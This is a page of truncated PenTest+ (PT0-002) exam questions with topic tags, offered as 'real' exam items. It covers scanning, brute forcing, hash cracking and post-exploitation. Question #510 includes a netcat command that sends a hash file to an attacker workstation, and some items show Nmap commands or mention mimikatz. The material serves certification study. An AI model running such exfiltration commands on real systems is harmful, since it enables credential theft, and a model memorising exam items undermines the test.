PT0-002 Exam Questions
593 real PT0-002 exam questions with expert-verified answers and explanations. Page 10 of 12.
- Question #479: Vulnerability discovery and analysis
An organization is using Android mobile devices but does not use MDM services. Which of the following describes an existing risk present in this scenario?
MDM, Android Security, Application Security, Risk Identification
- Question #480: Reconnaissance and enumeration
A penetration tester is conducting an assessment on a web application. Which of the following active reconnaissance techniques would be best for the tester to use to gather additio...
active reconnaissance, web application testing, interception proxy, URI crawling
- Question #481: Post-exploitation and lateral movement
A penetration tester exploits a vulnerable service to gain a shell on a target server. The tester receives the following: Directory of C:\Users\Guest 05/13/2022 09:23 PM mimikatz.e...
Mimikatz, Indicators of Compromise, Post-exploitation, Credential dumping
- Question #482: Vulnerability discovery and analysis
During a penetration test of a server application, a security consultant found that the application randomly crashed or remained stable after opening several simultaneous connectio...
Application Debugging, Vulnerability Analysis, Penetration Testing Tools, Concurrency Issues
- Question #484: Attacks and Exploits
While conducting a penetration test of a web application, the penetration tester enters the following URI: Which of the following attacks is the tester attempting?
Web Application Security, Directory Traversal, Penetration Testing, Vulnerability Discovery
- Question #485: Post-exploitation and lateral movement
Given the following Bash code snippet: Which of the following would be achieved?
Bash scripting, File download, Command-line utilities, Data transfer
- Question #486: Attacks and Exploits
While a penetration tester conducts a web application assessment, the following URL is accessed: Which of the following exploit types is being attempted?
SQL Injection, Web Application Attacks, Exploitation, Vulnerability Identification
- Question #487: Information Gathering and Vulnerability Scanning
During a reconnaissance exercise, a penetration tester runs the following Nmap command: nmap -sT -sV -T2 -p 1-65535 domain.com After watching the scan run for more than two hours,...
Nmap, Port scanning, Scan optimization, TCP SYN scan
- Question #488: Information Gathering and Vulnerability Scanning
A penetration tester is scanning a customer subnet and wants to scan ports that are known to have only well-known UDP services present. Which of the following can the tester use to...
nmap, UDP scan, Port scanning, Well-known ports
- Question #489: Attacks and Exploits
A penetration tester is testing a company's public APIs. In researching the API URLs, the penetration tester discovers that the URLs resolve to a cloud-hosted WAF service that is b...
WAF bypass, Evasion techniques, API security, Cloud security
- Question #490: Attacks and Exploits
A company recruited a penetration tester to brute force an SSH password on a server. The tester would like to use THC Hydra to perform the attack and remember the use of the -t opt...
THC Hydra, Brute-force attack, SSH, Penetration testing tools
- Question #491: Attacks and Exploits
During a security assessment, a penetration tester decides to use the following Python snippet: Which of the following best describes what the penetration tester is trying to achie...
Denial of Service (DoS), Web Server Attacks, Penetration Testing Techniques, Python Scripting
- Question #492: Engagement management
A penetration tester keeps a running diary of the day-to-day engagement activity. Which of the following is the most likely explanation for keeping the diary?
Engagement documentation, Lessons learned, Penetration testing process, Process improvement
- Question #493: Tools and Code Analysis
While performing a mobile application penetration test, a security consultant notices that the user password is being locally encrypted before it is sent to the back end for authen...
Mobile application security, Reverse engineering, Encryption analysis, Penetration testing
- Question #494: Information Gathering and Vulnerability Scanning
A penetration tester wants to identify the most common TCP ports on 10.7.8.69. Which of the following is the best Nmap command for this task?
Nmap, Port Scanning, TCP Ports, Enumeration
- Question #495: Reconnaissance and enumeration
A penetration tester is gathering information and wants to retrieve hostnames and IP addresses. Which of the following should the tester do?
DNS, Information Gathering, Host Discovery, Reconnaissance
- Question #496: Information Gathering and Vulnerability Scanning
A penetration tester needs to perform a vulnerability scan on a highly critical and fragile infrastructure system. Which of the following should the penetration tester do to minimi...
Vulnerability scanning, Risk mitigation, Query throttling, Fragile systems
- Question #497: Attacks and Exploits
A penetration tester discovers a login page during an assessment. Which of the following tools would the tester use to brute force a password?
Penetration testing tools, Password brute-force, Hydra, Web application attacks
- Question #498: Planning and Scoping
A penetration test is in the scoping phase of an engagement. Which of the following describes how a penetration tester would most effectively obtain the information necessary to be...
Scoping, Pre-engagement, Client Communication, Engagement Planning
- Question #499: Information Gathering and Vulnerability Scanning
A penetration tester would like to know if any web servers or mail servers are running on the in-scope network segment. Which of the following is the best to use in this scenario?
Nmap, Service discovery, Network scanning, Information gathering
- Question #500: Information Gathering and Vulnerability Scanning
A security analyst is conducting a penetration test for an online store with a database server. Which of the following tools would best assist the tester in detecting vulnerabiliti...
Vulnerability scanning, Penetration testing tools, Nessus, Database security
- Question #501: Planning and Scoping
Which of the following legal concepts specifically outlines the scope, deliverables, and timelines of a project or engagement?
SOW, Project documentation, Legal concepts, Engagement planning
- Question #502: Post-exploitation and lateral movement
A client claims that a ransomware attack has crippled its corporate network following a penetration test assessment. Which of the following is the most likely root cause of this is...
Post-exploitation cleanup, Tester artifacts, Credential management, Persistence
- Question #503: Reconnaissance and enumeration
A penetration tester runs an Nmap scan and obtains the following output: Which of the following should the penetration tester run next to explore this host further?
Active Directory, Enumeration, Reconnaissance, Penetration Testing Tools
- Question #504: Attacks and Exploits
A penetration tester is conducting a physical test against an organization. During the first day of the assessment, the tester follows an employee to the coffee shop next door. Whi...
Physical penetration testing, RFID cloning, Badge capture, Exploitation techniques
- Question #505: Reporting and Communication
Which of the following is a declaration from an independent third party that lends credibility to the part of the organization undergoing the review and is required as part of an a...
Audit terminology, Attestation, Reporting, Independent review
- Question #506: Post-exploitation and lateral movement
A penetration tester gained access to one of the target company's servers. During the enumeration phase, the penetration tester lists the bash history and observes the following ro...
Credential discovery, Bash history analysis, IMAPS exploitation, Post-exploitation
- Question #507: Attacks and Exploits
A penetration tester wants to crack MD5 hashes more quickly. The tester knows that the first part of the password is Winter followed by four digits and a special character at the e...
Hash cracking, Password cracking, Hashcat, MD5
- Question #509: Post-exploitation and lateral movement
Which of the following best explains why a penetration tester would use ProxyChains during an assessment?
ProxyChains, Lateral movement, Remote access, Networking tools
- Question #510: Post-exploitation and lateral movement
A penetration tester gets a shell on a server and runs the following command: nc kaliworkstation 4444 < hashes.txt The penetration tester runs the following command on a Kali works...
Netcat, File exfiltration, Post-exploitation, Data transfer
- Question #511: Reporting and Communication
In a standard engagement, a post-report document is provided outside of the report. This document: - Does not contain specific findings - Exposes vulnerabilities - Can be shared pu...
Executive summary, Reporting, Communication, Deliverables
- Question #512: Information Gathering and Vulnerability Scanning
A penetration tester is configuring a vulnerability management solution to perform a scan of Linux servers on an enterprise network. The client wants to reduce potential disruption...
Vulnerability scanning, Least privilege, Access control, Scan configuration
- Question #513: Tools and Code Analysis
A penetration tester is troubleshooting the right value for the urls variable that should be used in the following script: Which of the following instructions in a Python script wi...
Python Scripting, Data Manipulation, Duplicate Removal, Dictionary Comprehension
- Question #514: Reconnaissance and enumeration
While performing reconnaissance, a penetration tester runs Nmap and receives the following output: Nmap scan report for samplescan.org (44.33.55.66) Host is up (0.025s latency). No...
Traffic sniffing, Unencrypted protocols, Port security, Reconnaissance
- Question #515: Vulnerability discovery and analysis
During an assessment, a penetration tester was able to get access on all target servers by attempting authentication using a service account key that was published on the intranet...
Secrets management, Credential exposure, Vulnerability remediation, Service account security
- Question #516: Vulnerability discovery and analysis
A penetration tester discovers that an organization's infrastructure is hosted in the cloud. Which of the following technologies should the penetration tester explore for vulnerabi...
Cloud Security, Virtualization, Container Orchestration, Penetration Testing
- Question #517: Tools and Code Analysis
Given the following table: Which of the following data structures would most likely be used to store known-good configurations of firewall rules in a Python script?
Python, Data Structures, Scripting, Configuration Storage
- Question #518: Post-exploitation and lateral movement
A penetration tester is doing an assessment for a company that requires an external command-and-control server. The command-and-control tool should be able to use multiple types o...
Command and Control, Post-exploitation, C2 Frameworks, Payloads
- Question #519: Reconnaissance and enumeration
A penetration tester is gathering information about a target company for a penetration test in order to tailor the type of attacks. However, the tester is worried about sending pac...
Passive reconnaissance, Information gathering, Shodan, OSINT
- Question #520: Attacks and Exploits
Which of the following is the most effective method for ensuring a payload or exploit will run regardless of the operating system version?
Static compilation, Payload portability, Exploit reliability
- Question #521: Information Gathering and Vulnerability Scanning
A security analyst is conducting a penetration test for an online store with a database server. Which of the following tools would best assist the tester in detecting vulnerabiliti...
SQL Injection, Database Vulnerabilities, Penetration Testing Tools, Vulnerability Scanning
- Question #522: Attacks and Exploits
An employee received an email stating that a bank account was deactivated and will expire if the employee does not respond within the next 24 hours. Which of the following attacks...
Phishing, Social Engineering, Email-based attacks
- Question #523: Information Gathering and Vulnerability Scanning
During a vulnerability management process that lasted several months, a security analyst found the number of vulnerabilities in a production web application consistently grew. Whic...
CI/CD security, Application security, Vulnerability scanning, DevSecOps
- Question #524: Reporting and Communication
Which of the following types of communication should a penetration tester provide a client to document test results for PCI DSS compliance?
PCI DSS compliance, Reporting, Attestation, Documentation
- Question #525: Reporting and Communication
Which of the following identifies a condensed, high-level discussion of findings during a penetration test reporting activity?
Reporting, Executive Summary, Penetration Testing, Report Structure
- Question #526: Reconnaissance and enumeration
A penetration tester developed the following script: Which of the following best explains the purpose of this script?
DNS enumeration, Reconnaissance, Host mapping, Network discovery
- Question #527: Reporting and Communication
During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the foll...
Wireless security, Network hardening, Remediation, Physical security
- Question #528: Reconnaissance and enumeration
Which of the following tools is commonly used for network scanning and enumeration during a penetration test?
Network scanning, Enumeration, Penetration testing tools, Nmap
- Question #529: Engagement management
A client evaluating a penetration testing company requests examples of its work. Which of the following represents the best course of action for the penetration testers?
Client Confidentiality, Professional Ethics, Engagement Management, Report Sharing Policy
- Question #530: Engagement management
Which of the following documents best ensures an external consulting firm that is hired to perform a penetration test understands and complies with the customer's security policies...
Rules of Engagement, Penetration Testing, Compliance, Security Policies